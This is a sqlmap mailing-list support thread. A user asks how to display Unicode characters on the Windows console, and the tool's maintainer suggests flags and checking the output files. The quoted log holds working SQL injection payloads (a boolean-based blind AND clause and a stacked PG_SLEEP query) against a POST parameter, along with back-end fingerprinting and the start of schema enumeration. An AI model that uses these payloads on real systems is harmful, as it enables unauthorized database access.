Hi. There is a chance that you maybe have a false positive in your case. It would be best if you could try everything from the beginning with --flush-session.
If it's not a false positive, you can try to use switches like --text-only (I can see a boolean-based blind in your case). That way you could remove potential garbage. As a last resort, to come to your question, you can try two things: either run sqlmap from Linux or just take a look into the output files (e.g. ./output/site/log). Windows console can't display non-ASCII unicode characters out of the box. Kind regards, Miroslav Stampar On Fri, Feb 7, 2014 at 10:45 AM, Marco Mirandola <mmmc...@gmail.com> wrote: > good morning > Is there a way to show these unicode characters? > > ======================================== > > [10:42:30] [INFO] using 'P:\webscanner\New folder > (2)\SqlMapwc\trunk\output\resu > lts-02072014_1042am.csv' as the CSV results file in multiple targets mode > sqlmap identified the following injection points with a total of 0 HTTP(s) > reque > sts: > --- > Place: POST > Parameter: SubmitOkProtected2 > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: > service=pDirect&context=HotStreamProtectedWarning.FormProtected2/cn > t.warning&sp=S0&SubmitOkProtected2= YES ' AND 2597=2597 AND > 'PDQD'='PDQD&For > m0=2 > Type: stacked queries > Title: PostgreSQL > 8.1 stacked queries > Payload: > service=pDirect&context=HotStreamProtectedWarning.FormProtected2/cn > t.warning&sp=S0&SubmitOkProtected2= YES '; SELECT PG_SLEEP(5)--&Form0=2 > --- > do you want to exploit this SQL injection? [Y/n] > [10:42:34] [INFO] the back-end DBMS is PostgreSQL > web server operating system: Linux SuSE 10.3 > web application technology: Servlet 2.4, Tomcat 4.0.3, Apache 2.2.4 > back-end DBMS: PostgreSQL > [10:42:34] [WARNING] schema names are going to be used on PostgreSQL for > enumera > tion as the counterpart to database names on other DBMSes > [10:42:34] [INFO] fetching database (schema) names > [10:42:34] [INFO] fetching number of databases > [10:42:34] [INFO] resumed: 9 > [10:42:34] [WARNING] cannot properly display Unicode characters inside > Windows O > S command prompt (http://bugs.python.org/issue1602). All unhandled > occurances wi > ll result in replacement with '?' character. Please, find proper character > repre > sentation inside corresponding output files. > [10:42:34] [INFO] resuming partial value: ?| > [10:42:34] [WARNING] running in a single-thread mode. Please consider > usage of o > ption '--threads' for faster data retrieval > [10:42:34] [INFO] retrieved: _ > [10:43:01] [WARNING] user aborted in multiple target mode > > ======================================== > -- > > *[image: Descrizione: Descrizione: image002] Rispetta l'ambiente. Non > stampare questa mail se non è necessario* > > *Questa e-mail è riservata compresi gli eventuali allegati. In caso di > ricezione per errore della presente e-mail siete pregati di darne > comunicazione al mittente mediante e-mail di risposta e di cancellare > immediatamente questo messaggio, essendo escluso il consenso in ordine a > qualsiasi tipo di trattamento del suo contenuto e dei relativi allegati. * > > *Vi ringraziamo per la collaborazione. This e-mail and any attachments are > confidential. If you have received this e-mail by mistake, please inform > the sender immediately by reply e-mail and then delete it from your system. > Any processing of this e-mail and its attachments is not authorized. **Thank > you for your cooperation*. > > > ------------------------------------------------------------------------------ > Managing the Performance of Cloud-Based Applications > Take advantage of what the Cloud has to offer - Avoid Common Pitfalls. > Read the Whitepaper. > > http://pubads.g.doubleclick.net/gampad/clk?id=121051231&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm
<<image002.jpg>>
------------------------------------------------------------------------------ Managing the Performance of Cloud-Based Applications Take advantage of what the Cloud has to offer - Avoid Common Pitfalls. Read the Whitepaper. http://pubads.g.doubleclick.net/gampad/clk?id=121051231&iu=/4140/ostg.clktrk
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
